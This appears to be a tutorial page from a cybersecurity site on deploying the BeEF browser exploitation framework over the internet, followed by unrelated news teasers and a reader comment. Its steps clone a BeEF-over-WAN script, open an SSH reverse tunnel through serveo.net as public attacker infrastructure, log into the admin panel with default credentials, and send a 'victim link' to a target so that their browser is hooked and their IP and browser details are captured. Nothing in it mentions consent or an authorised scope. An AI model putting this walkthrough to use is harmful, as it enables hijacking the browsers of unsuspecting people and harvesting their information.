Beef Xss Framework is a browser exploitation tool. It mainly focuses on client-side attacks and web-based browsers.
It helps a penetration tester to understand past the network perimeter and client system. Its available in Kali Linux and other penetration testing operating systems by Default.
You can use ngrok or serveo, however, ngrok doesn’t allow running multiple tunnels in the free version. so we will go with serveo. Scroll down for the video on ngrok.
Step 1 :
Boot up Kali Linux and download beef over wan by typing in the terminal
git clone https://github.com/stormshadow07/BeeF-Over-Wan.git
Step 2 :
Now navigate into the directory by typing the commands.
cd BeeF-Over-Wan
chmod +x BeeFOverWan.py && python BeeFOverWan.py
type 1 & press enter
Step 3 :
open a new terminal to run server type in the command
ssh -R 80:localhost:80 -R 8090:localhost:3000 serveo.net
make a note here that the HTTP traffic URL is to be pasted in the other terminal, whereas the one pointing to port 8090 needs to be pasted for the admin interface beef xss framework.
victim link: opposui.serveo.net
admin URL: serveo.net:8090
Step 4 :
Paste the URLs in the other terminal where the beef over wan script is running.
Step 5 :
Sign in to the admin, Do remember the URL will be different for you guys so make sure you type in the correct one. The default username is beef and the password is beef.
Step 6 :
Now pass on the hooking URL to the target, Once the target clicks it. You should be able to see their IP address and browser information in your admin panel.
Here you can see the video demonstration of Beef Xss Framework over WAN.
You can follow us on Linkedin, Twitter, and Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep yourself self-updated.
The Lotus Blossom hacker group, also known as Spring Dragon, Billbug, or Thrip, has been…
A newly identified malware, dubbed "Squidoor," has emerged as a sophisticated threat targeting government, defense,…
Cyber adversaries have evolved into highly organized and professional entities, mirroring the operational efficiency of…
In Q3 2024, Cofense Intelligence uncovered a targeted spear-phishing campaign aimed at employees working in…
The DragonForce ransomware group has launched a significant cyberattack on critical infrastructure in Saudi Arabia,…
In a concerning development, cybersecurity researchers at Trellix have uncovered a sophisticated malware campaign that…
View Comments
i think no one can do this in internet without this tool right? i see everytime the same damn tool on every topic but is not working :D